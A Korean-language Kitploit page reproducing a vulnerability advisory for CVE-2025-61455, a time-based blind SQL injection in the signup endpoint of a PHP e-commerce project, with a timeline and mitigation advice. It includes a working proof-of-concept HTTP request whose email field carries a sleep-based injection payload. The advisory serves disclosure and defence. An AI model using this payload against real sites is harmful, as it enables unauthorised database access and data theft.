Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-61455 — CVE-2025-61455에 대한 공개 공개 및 개념 증명(PoC) 자료로, E-commerce Project v1.0의 치명적인 SQL 인젝션 취약점에 대한 기술적 세부 사항, PoC, 및 완화 권장 사항을 포함합니다. | Kitploit
도구/GitHubGitHub/tansique-17/cve-2025-61455
Vulnerability AnalysisExploitationWeb SecurityLearning & EducationCurated Resources
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

CVE-2025-61455에 대한 공개 공개 및 개념 증명(PoC) 자료로, E-commerce Project v1.0의 치명적인 SQL 인젝션 취약점에 대한 기술적 세부 사항, PoC, 및 완화 권장 사항을 포함합니다.

저장소 보기
111개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
웹사이트
공유

🛡️ CVE 공개: CVE-2025-61455 — 전자상거래 프로젝트의 SQL 인젝션

공개 날짜: 2025년 10월 14일
CVE ID: CVE-2025-61455
심각도: CRITICAL (CVSS 9.8)


🧩 요약

E-commerce Project v1.0의 signup.inc.php 엔드포인트에 치명적인 SQL 인젝션 취약점이 존재합니다. 이 애플리케이션은 검증되지 않은 사용자 입력을 SQL 쿼리에 직접 포함하여, 인증되지 않은 공격자가 인증을 우회하고 임의의 SQL 명령을 실행할 수 있게 합니다.

이 문제에는 CVE-2025-61455 식별자가 할당되었습니다. 공개 당시 공식 패치는 제공되지 않았습니다.


📦 영향을 받는 제품

  • 공급업체: 독립 (Bhabishya-123)
  • 프로젝트: E-commerce
  • 버전: v1.0
  • 파일: signup.inc.php
  • 취약한 엔드포인트:
    https://localhost/e-commerce-main/includes/signup.inc.php

🔬 취약점 세부 정보

이 애플리케이션은 입력 검증이나 준비된 문(prepared statements) 없이 검증되지 않은 입력을 SQL 쿼리에 직접 사용합니다. 취약점은 signup.inc.php 파일의 aid 매개변수에 존재합니다.

공격자는 이메일 매개변수를 통해 악성 SQL 코드를 주입하여 시간 기반 블라인드 SQL 인젝션 공격을 수행할 수 있습니다.

취약한 코드 패턴 예시:

root@kitploit:~
$query = "SELECT * FROM table WHERE email='$email'";

이로 인해 쿼리 로직을 조작하고 민감한 데이터를 추출할 수 있는 인젝션 페이로드가 가능해집니다.


📌 CWE 분류

CWE ID제목
CWE-89SQL 명령에 사용되는 특수 요소의 부적절한 중화

📊 CVSS v3.1 점수

점수심각도벡터 문자열
9.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

💥 영향

성공적인 악용 시 다음과 같은 결과가 발생할 수 있습니다:

  • ✅ 완전한 인증 우회
  • 🔓 권한 있는 기능에 대한 무단 액세스
  • 📊 시간 기반 블라인드 SQL 인젝션을 통한 데이터 유출
  • 🛠️ 잠재적인 데이터 조작 또는 삭제
  • ⚠️ 백엔드 데이터베이스의 완전한 손상
  • 💻 원격 코드 실행 가능성

🧪 개념 증명 (PoC)

1. 저장소 복제

root@kitploit:~
git clone https://github.com/Bhabishya-123/E-commerce.git

2. 로컬 호스팅

XAMPP/LAMP를 사용하여 프로젝트를 배포하고 다음으로 이동합니다:

root@kitploit:~
http://localhost/e-commerce-main/includes/signup.inc.php

3. 페이로드 주입

다음 악성 HTTP 요청을 전송합니다:

root@kitploit:~
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=

설명:
이메일 매개변수에는 시간 기반 SQL 인젝션 페이로드가 포함되어 있습니다: '+(select*from(select(sleep(20)))a)+'

애플리케이션이 응답하기 전에 20초 동안 지연되면 SQL 인젝션이 성공한 것입니다.


🔐 권장 사항

  • ✅ 동적 SQL 쿼리를 준비된 문(mysqli_prepare() 또는 PDO)으로 대체하세요.
  • 🔍 모든 사용자 입력에 대해 입력 검증 및 삭제(sanitization) 를 수행하세요.
  • 🧱 알려진 SQL 인젝션 패턴을 차단하기 위해 웹 애플리케이션 방화벽(WAF) 을 배포하세요.
  • 🛡️ 조기 발견을 위해 정기적인 코드 감사 및 침투 테스트를 수행하세요.
  • 🔒 모든 데이터베이스 상호작용에 매개변수화된 쿼리를 구현하세요.
  • 📝 가능한 경우 입력 검증에 허용 목록(allowlist) 을 사용하세요.

📆 타임라인

이벤트날짜
취약점 발견2025년 9월 16일
공개 공개2025년 10월 13일
패치 제공❌ 공개 시점 기준 제공되지 않음

🙋‍♂️ 크레딧

이 취약점은 다음에 의해 발견되어 책임감 있게 공개되었습니다:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 참고 자료

  • OWASP - SQL 인젝션
  • PortSwigger - SQL 인젝션
  • CVE.org의 CVE-2025-61455

💬 공급업체의 응답이 없어 이 권고는 독립적으로 게시되었습니다.

도구 다운로드